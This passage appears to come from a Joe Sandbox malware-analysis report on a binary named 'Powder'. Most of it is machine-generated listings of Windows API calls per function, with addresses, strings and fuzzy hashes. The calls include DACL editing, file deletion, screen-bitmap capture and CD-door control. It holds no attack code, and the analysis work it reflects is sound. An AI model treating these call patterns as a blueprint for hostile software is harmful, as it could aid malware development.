                                                  • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                  • String ID: *.*
                                                  • API String ID: 3566783562-438819550
                                                  • Opcode ID: 2aa22f8b148252d79c1c305834fb33d64d8824ea687bacc9f135bc80a59d9ed7
                                                  • Instruction ID: 383c015043571ddb59c90398241e87f6ad0f4e031b1204a2a5ccc6d38b28f0c8
                                                  • Opcode Fuzzy Hash: 2aa22f8b148252d79c1c305834fb33d64d8824ea687bacc9f135bc80a59d9ed7
                                                  • Instruction Fuzzy Hash: 736188B6504305AFC710EF60D84499FB3E8FF88354F04991EF999A72A1EB31E945CB92
                                                  APIs
                                                    • Part of subcall function 00E01F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E02412,?,00000000,?,?,?,?,00E01AA7,00000000,?), ref: 00E01F76
                                                  • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00E024AF
                                                  • KillTimer.USER32(-00000001,?,?,?,?,00E01AA7,00000000,?,?,00E01EBE,?,?), ref: 00E0254A
                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 00E3BFE7
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E01AA7,00000000,?,?,00E01EBE,?,?), ref: 00E3C018
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E01AA7,00000000,?,?,00E01EBE,?,?), ref: 00E3C02F
                                                  • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00E01AA7,00000000,?,?,00E01EBE,?,?), ref: 00E3C04B
                                                  • DeleteObject.GDI32(00000000), ref: 00E3C05D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                  • String ID: h
                                                  • API String ID: 641708696-1717268160
                                                  • Opcode ID: f3959ecea8bfef64e74c89380ff3fc84f05a4aa498be6ed11a04db561e0a255a
                                                  • Instruction ID: 8bd8c3bbc40fea8ed95d9843e24b2d49b7de4157b627b4f3761db401da187ad6
                                                  • Opcode Fuzzy Hash: f3959ecea8bfef64e74c89380ff3fc84f05a4aa498be6ed11a04db561e0a255a
                                                  • Instruction Fuzzy Hash: 0B61CD31104650DFCB299F15DD4CB2A7BF1FB4031AF20A52EE69276AA0C372A8D5DF91
                                                  APIs
                                                  • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00E6A2C2
                                                    • Part of subcall function 00E11A36: _memmove.LIBCMT ref: 00E11A77
                                                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00E6A2E3
                                                  • __swprintf.LIBCMT ref: 00E6A33C
                                                  • __swprintf.LIBCMT ref: 00E6A355
                                                  • _wprintf.LIBCMT ref: 00E6A3FC
                                                  • _wprintf.LIBCMT ref: 00E6A41A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: LoadString__swprintf_wprintf$_memmove
                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                  • API String ID: 311963372-3080491070
                                                  • Opcode ID: 54dfe7e10039ef5e47661a1767261e7bab1415964f6c8ed9c3e4367f105ccbd7
                                                  • Instruction ID: 6e09bc46f330134c92a40cf0aa398f7c3050672f6149b4be18be37556bed37fd
                                                  • Opcode Fuzzy Hash: 54dfe7e10039ef5e47661a1767261e7bab1415964f6c8ed9c3e4367f105ccbd7
                                                  • Instruction Fuzzy Hash: 9451E371D40219AACF18EBE0DD46EEEB7B9AF04380F1011A5F505B20A2EB752F99CF51
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00E4F8B8,00000001,0000138C,00000001,00000000,00000001,?,00E73FF9,00000000), ref: 00E6009A
                                                  • LoadStringW.USER32(00000000,?,00E4F8B8,00000001), ref: 00E600A3
                                                    • Part of subcall function 00E11A36: _memmove.LIBCMT ref: 00E11A77
                                                  • GetModuleHandleW.KERNEL32(00000000,00EC7310,?,00000FFF,?,?,00E4F8B8,00000001,0000138C,00000001,00000000,00000001,?,00E73FF9,00000000,00000001), ref: 00E600C5
                                                  • LoadStringW.USER32(00000000,?,00E4F8B8,00000001), ref: 00E600C8
                                                  • __swprintf.LIBCMT ref: 00E60118
                                                  • __swprintf.LIBCMT ref: 00E60129
                                                  • _wprintf.LIBCMT ref: 00E601D2
                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00E601E9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                  • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                  • API String ID: 984253442-2268648507
                                                  • Opcode ID: 5b94339d92a2697777c31ecef39f72693dd3e05b8245139b9dd3d3d279e1ec90
                                                  • Instruction ID: f970880c5c07542b9aaf6a86548cbba8723f48e537e9994fb2f3c786fcc7bced
                                                  • Opcode Fuzzy Hash: 5b94339d92a2697777c31ecef39f72693dd3e05b8245139b9dd3d3d279e1ec90
                                                  • Instruction Fuzzy Hash: 9A417372840219AACF14EBE0DD96DEFB7BCAF54340F5011A5F605B2092DB356F89CBA1
                                                  APIs
                                                    • Part of subcall function 00E04D37: __itow.LIBCMT ref: 00E04D62
                                                    • Part of subcall function 00E04D37: __swprintf.LIBCMT ref: 00E04DAC
                                                  • CharLowerBuffW.USER32(?,?), ref: 00E6AA0E
                                                  • GetDriveTypeW.KERNEL32 ref: 00E6AA5B
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E6AAA3
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E6AADA
                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00E6AB08
                                                    • Part of subcall function 00E11821: _memmove.LIBCMT ref: 00E1185B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                  • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                  • API String ID: 2698844021-4113822522
                                                  • Opcode ID: f3e93d1f6b3a37fea573b8ae90cb904e8da0e32cd9b242f5472f8b84482cc20d
                                                  • Instruction ID: 706ef470fc6fc9c697c127bab54e30b23d30ceee413fd313bfee24369b814a41
                                                  • Opcode Fuzzy Hash: f3e93d1f6b3a37fea573b8ae90cb904e8da0e32cd9b242f5472f8b84482cc20d
                                                  • Instruction Fuzzy Hash: EB517BB15043059FC300EF10D9818AAB3E9FF98358F14596DF895B72A1DB31AE49CF92
                                                  APIs
                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00E6A852
                                                  • __swprintf.LIBCMT ref: 00E6A874
                                                  • CreateDirectoryW.KERNEL32(?,00000000), ref: 00E6A8B1
                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00E6A8D6
                                                  • _memset.LIBCMT ref: 00E6A8F5
                                                  • _wcsncpy.LIBCMT ref: 00E6A931
                                                  • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00E6A966
                                                  • CloseHandle.KERNEL32(00000000), ref: 00E6A971
                                                  • RemoveDirectoryW.KERNEL32(?), ref: 00E6A97A
                                                  • CloseHandle.KERNEL32(00000000), ref: 00E6A984
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                  • String ID: :$\$\??\%s
                                                  • API String ID: 2733774712-3457252023
                                                  • Opcode ID: 8d63cba2bcbe6a98d8e47c7a51186381011ba1263344c556569d4248cca9f5d1
                                                  • Instruction ID: a291f57852d0feaf555c5b9fa29aff7ced9420671e6f36f2754337df70500d8b
                                                  • Opcode Fuzzy Hash: 8d63cba2bcbe6a98d8e47c7a51186381011ba1263344c556569d4248cca9f5d1
                                                  • Instruction Fuzzy Hash: 4B319D7294021AAFDB219FA1EC49FEB77BCEF88740F5451B6F608F2160E67096448F25
                                                  APIs
                                                  • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00E8982C,?,?), ref: 00E8C0C8
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00E8982C,?,?,00000000,?), ref: 00E8C0DF
                                                  • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00E8982C,?,?,00000000,?), ref: 00E8C0EA
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00E8982C,?,?,00000000,?), ref: 00E8C0F7
                                                  • GlobalLock.KERNEL32(00000000), ref: 00E8C100
                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E8982C,?,?,00000000,?), ref: 00E8C10F
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00E8C118
                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00E8982C,?,?,00000000,?), ref: 00E8C11F
                                                  • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00E8982C,?,?,00000000,?), ref: 00E8C130
                                                  • OleLoadPicture.OLEAUT32(?,00000000,00000000,00E93C7C,?), ref: 00E8C149
                                                  • GlobalFree.KERNEL32(00000000), ref: 00E8C159
                                                  • GetObjectW.GDI32(00000000,00000018,?), ref: 00E8C17D
                                                  • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00E8C1A8
                                                  • DeleteObject.GDI32(00000000), ref: 00E8C1D0
                                                  • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00E8C1E6
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                  • String ID:
                                                  • API String ID: 3840717409-0
                                                  • Opcode ID: c681ef30206ef8c3ff3bc23bec1ecdd4c40aba94683b5331decc855f8953c11e
                                                  • Instruction ID: e2a1d20df118071cb80ac972fa1c8935ff5bca1bc283ba784991ef61c174106f
                                                  • Opcode Fuzzy Hash: c681ef30206ef8c3ff3bc23bec1ecdd4c40aba94683b5331decc855f8953c11e
                                                  • Instruction Fuzzy Hash: 74415B71601204EFCB219F66DC8CEAE7BB8EF8A715F50405AF909E7261C7309944CB60
                                                  APIs
                                                    • Part of subcall function 00E029E2: GetWindowLongW.USER32(?,000000EB), ref: 00E029F3
                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00E8C8A4
                                                  • GetFocus.USER32 ref: 00E8C8B4
                                                  • GetDlgCtrlID.USER32(00000000), ref: 00E8C8BF
                                                  • _memset.LIBCMT ref: 00E8C9EA
                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00E8CA15
                                                  • GetMenuItemCount.USER32(?), ref: 00E8CA35
                                                  • GetMenuItemID.USER32(?,00000000), ref: 00E8CA48
                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00E8CA7C
                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00E8CAC4
                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00E8CAFC
                                                  • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 00E8CB31
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                  • String ID: 0
                                                  • API String ID: 1296962147-4108050209
                                                  • Opcode ID: b59d64abe2bc8d287707b754f2269b9ad6761785cb941e4ee3b642303870a50b
                                                  • Instruction ID: f3842d4c1173b8061a622fd687a8d46c5f2df3ad2f1f20177690b2d1c27f2e5f
                                                  • Opcode Fuzzy Hash: b59d64abe2bc8d287707b754f2269b9ad6761785cb941e4ee3b642303870a50b
                                                  • Instruction Fuzzy Hash: C6817C712083059FD714EF14C985E6A7BE8EF89318F20596EF99DB3291C731D905CBA2
                                                  APIs
                                                    • Part of subcall function 00E58E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E58E3C
                                                    • Part of subcall function 00E58E20: GetLastError.KERNEL32(?,00E58900,?,?,?), ref: 00E58E46
                                                    • Part of subcall function 00E58E20: GetProcessHeap.KERNEL32(00000008,?,?,00E58900,?,?,?), ref: 00E58E55
                                                    • Part of subcall function 00E58E20: HeapAlloc.KERNEL32(00000000,?,00E58900,?,?,?), ref: 00E58E5C
                                                    • Part of subcall function 00E58E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E58E73
                                                    • Part of subcall function 00E58EBD: GetProcessHeap.KERNEL32(00000008,00E58916,00000000,00000000,?,00E58916,?), ref: 00E58EC9
                                                    • Part of subcall function 00E58EBD: HeapAlloc.KERNEL32(00000000,?,00E58916,?), ref: 00E58ED0
                                                    • Part of subcall function 00E58EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00E58916,?), ref: 00E58EE1
                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00E58B2E
                                                  • _memset.LIBCMT ref: 00E58B43
                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00E58B62
                                                  • GetLengthSid.ADVAPI32(?), ref: 00E58B73
                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 00E58BB0
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00E58BCC
                                                  • GetLengthSid.ADVAPI32(?), ref: 00E58BE9
                                                  • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00E58BF8
                                                  • HeapAlloc.KERNEL32(00000000), ref: 00E58BFF
                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00E58C20
                                                  • CopySid.ADVAPI32(00000000), ref: 00E58C27
                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00E58C58
                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00E58C7E
                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00E58C92
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                  • String ID:
                                                  • API String ID: 3996160137-0
                                                  • Opcode ID: e654b56bacf7c2e4a8f201c8e6d0620e54d6bf45bfddd749337b8daf5745a715
                                                  • Instruction ID: 1ed3f2b6589cc053b36044124f46274484a1801c96ec15d40e90ccd7f6a89d56
                                                  • Opcode Fuzzy Hash: e654b56bacf7c2e4a8f201c8e6d0620e54d6bf45bfddd749337b8daf5745a715
                                                  • Instruction Fuzzy Hash: 6F617875900209AFCF10DFA1DD45EEEBBB9FF05305F04896AF915B6290DB35AA08CB60
                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 00E77A79
                                                  • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00E77A85
                                                  • CreateCompatibleDC.GDI32(?), ref: 00E77A91
                                                  • SelectObject.GDI32(00000000,?), ref: 00E77A9E
                                                  • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00E77AF2
                                                  • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00E77B2E
                                                  • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00E77B52
                                                  • SelectObject.GDI32(00000006,?), ref: 00E77B5A
                                                  • DeleteObject.GDI32(?), ref: 00E77B63
                                                  • DeleteDC.GDI32(00000006), ref: 00E77B6A
                                                  • ReleaseDC.USER32(00000000,?), ref: 00E77B75
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                  • String ID: (
                                                  • API String ID: 2598888154-3887548279
                                                  • Opcode ID: 23d01cd0f5a37bb37de3cba793f9326ad676e58b8f79268b23662a62b0a86c5f
                                                  • Instruction ID: 564f3b192405bac37958338817abc472622aead509362a51f0581d4a0d1e8d72
                                                  • Opcode Fuzzy Hash: 23d01cd0f5a37bb37de3cba793f9326ad676e58b8f79268b23662a62b0a86c5f
                                                  • Instruction Fuzzy Hash: BC514C71904309EFDB14CFA9DC85EAEBBB9EF48310F14841EF989A7250D731A945CB60
                                                  APIs
                                                  • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00E6A4D4
                                                    • Part of subcall function 00E11A36: _memmove.LIBCMT ref: 00E11A77
                                                  • LoadStringW.USER32(?,?,00000FFF,?), ref: 00E6A4F6
                                                  • __swprintf.LIBCMT ref: 00E6A54F
                                                  • __swprintf.LIBCMT ref: 00E6A568
                                                  • _wprintf.LIBCMT ref: 00E6A61E
                                                  • _wprintf.LIBCMT ref: 00E6A63C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: LoadString__swprintf_wprintf$_memmove
                                                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                  • API String ID: 311963372-2391861430
                                                  • Opcode ID: f25a52d4255eba4a80b361a758f868eb97f7cb3793166436a25e4f8179469717
                                                  • Instruction ID: fd24417bc66a483bd1eeb273f52d193907c1a51e49099ee72df881d9d7518974
                                                  • Opcode Fuzzy Hash: f25a52d4255eba4a80b361a758f868eb97f7cb3793166436a25e4f8179469717
                                                  • Instruction Fuzzy Hash: 80519371C40219AACF19EBE0DD46EEEB7B9AF04380F1411A5F605720A2EB316F98DF51
                                                  APIs
                                                    • Part of subcall function 00E6951A: __time64.LIBCMT ref: 00E69524
                                                    • Part of subcall function 00E14A8C: _fseek.LIBCMT ref: 00E14AA4
                                                  • __wsplitpath.LIBCMT ref: 00E697EF
                                                    • Part of subcall function 00E2431E: __wsplitpath_helper.LIBCMT ref: 00E2435E
                                                  • _wcscpy.LIBCMT ref: 00E69802
                                                  • _wcscat.LIBCMT ref: 00E69815
                                                  • __wsplitpath.LIBCMT ref: 00E6983A
                                                  • _wcscat.LIBCMT ref: 00E69850
                                                  • _wcscat.LIBCMT ref: 00E69863
                                                    • Part of subcall function 00E69560: _memmove.LIBCMT ref: 00E69599
                                                    • Part of subcall function 00E69560: _memmove.LIBCMT ref: 00E695A8
                                                  • _wcscmp.LIBCMT ref: 00E697AA
                                                    • Part of subcall function 00E69CF1: _wcscmp.LIBCMT ref: 00E69DE1
                                                    • Part of subcall function 00E69CF1: _wcscmp.LIBCMT ref: 00E69DF4
                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00E69A0D
                                                  • _wcsncpy.LIBCMT ref: 00E69A80
                                                  • DeleteFileW.KERNEL32(?,?), ref: 00E69AB6
                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00E69ACC
                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E69ADD
                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00E69AEF
                                                  Memory Dump Source
                                                  • Source File: 0000000A.00000002.3570205082.0000000000E01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00E00000, based on PE: true
                                                  • Associated: 0000000A.00000002.3570113685.0000000000E00000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000E90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570509646.0000000000EC0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                  • Associated: 0000000A.00000002.3570573452.0000000000EC9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_10_2_e00000_Powder.jbxd
                                                  Similarity
                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                  • String ID:
                                                  • API String ID: 1500180987-0
                                                  • Opcode ID: f8513c35002495ef0f817fdfabf069929e69123cf00273616618dc2efeb82805
                                                  • Instruction ID: 25582aef20ec57c4529db9bed981eb49983e1c5579faa8cd68370618e67a0696
                                                  • Opcode Fuzzy Hash: f8513c35002495ef0f817fdfabf069929e69123cf00273616618dc2efeb82805
                                                  • Instruction Fuzzy Hash: 66C14DB1940228AADF11DF95DC85ADEB7FDEF44350F0050AAF609F7252EB309A848F65
                                                  APIs
                                                  • _memset.LIBCMT ref: 00E15BF1
                                                  • GetMenuItemCount.USER32(00EC7890), ref: 00E50E7B
                                                  • GetMenuItemCount.USER32(00EC7890), ref: 00E50F2B
                                                  • GetCursorPos.USER32(?), ref: 00E50F6F
                                                  • SetForegroundWindow.USER32(00000000), ref: 00E50F78
                                                  • TrackPopupMenuEx.USER32(00EC7890,00000000,?,00000000,00000000,00000000), ref: 00E50F8B
                                                  • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E50F97
                                                  Memory Dump Source
